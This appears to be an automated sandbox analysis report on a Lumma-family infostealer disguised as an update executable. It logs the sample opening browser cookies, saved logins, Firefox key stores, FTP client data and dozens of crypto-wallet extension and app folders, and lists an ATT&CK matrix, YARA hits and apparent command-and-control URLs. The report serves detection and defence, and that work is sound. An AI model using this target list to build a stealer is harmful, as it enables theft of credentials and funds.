                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: Yara matchFile source: 00000000.00000003.3109623142.000000000196B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: NewI Upd v1.1.0.exe PID: 6648, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: NewI Upd v1.1.0.exe PID: 6648, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.NewI Upd v1.1.0.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.3179555778.00000000017B0000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  21
                  Virtualization/Sandbox Evasion
                  2
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  21
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  PowerShell
                  Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
                  Deobfuscate/Decode Files or Information
                  LSASS Memory241
                  Security Software Discovery
                  Remote Desktop Protocol41
                  Data from Local System
                  2
                  Non-Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information
                  Security Account Manager21
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares2
                  Clipboard Data
                  113
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading
                  NTDS1
                  Process Discovery
                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets12
                  File and Directory Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials34
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  NewI Upd v1.1.0.exe42%ReversingLabsWin32.Trojan.LummaC
                  NewI Upd v1.1.0.exe35%VirustotalBrowse
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://begguinnerz.biz:443/apis92o4p.default-release/key4.dbPK0%Avira URL Cloudsafe
                  https://begguinnerz.biz/40%Avira URL Cloudsafe
                  https://begguinnerz.biz/piT0%Avira URL Cloudsafe
                  https://begguinnerz.biz:443/apin.txtPK0%Avira URL Cloudsafe
                  begguinnerz.biz0%Avira URL Cloudsafe
                  https://begguinnerz.biz/0%Avira URL Cloudsafe
                  https://begguinnerz.biz/$0%Avira URL Cloudsafe
                  https://begguinnerz.biz/apiz/0%Avira URL Cloudsafe
                  https://begguinnerz.biz:443/apiOO0%Avira URL Cloudsafe
                  https://begguinnerz.biz/L0%Avira URL Cloudsafe
                  https://begguinnerz.biz/pil0%Avira URL Cloudsafe
                  https://begguinnerz.biz:443/api0%Avira URL Cloudsafe
                  https://begguinnerz.biz/D0%Avira URL Cloudsafe
                  https://begguinnerz.biz/api0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  begguinnerz.biz
                  172.67.190.223
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    wordyfindy.latfalse
                      high
                      slipperyloo.latfalse
                        high
                        curverpluch.latfalse
                          high
                          tentabatte.latfalse
                            high
                            manyrestro.latfalse
                              high
                              shapestickyr.latfalse
                                high
                                begguinnerz.biztrue
                                • Avira URL Cloud: safe
                                unknown
                                talkynicer.latfalse
                                  high
                                  bashfulacid.latfalse
                                    high
                                    https://begguinnerz.biz/apitrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabNewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://begguinnerz.biz:443/apis92o4p.default-release/key4.dbPKNewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://duckduckgo.com/ac/?q=NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoNewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://begguinnerz.biz/4NewI Upd v1.1.0.exe, 00000000.00000002.3179960747.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178564571.000000000198A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://begguinnerz.biz:443/apin.txtPKNewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.rootca1.amazontrust.com/rootca1.crl0NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://begguinnerz.biz/piTNewI Upd v1.1.0.exe, 00000000.00000003.3129801074.000000000198A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://begguinnerz.biz/NewI Upd v1.1.0.exe, 00000000.00000003.3143277934.000000000198A000.00000004.00000020.00020000.00000000.sdmpfalse
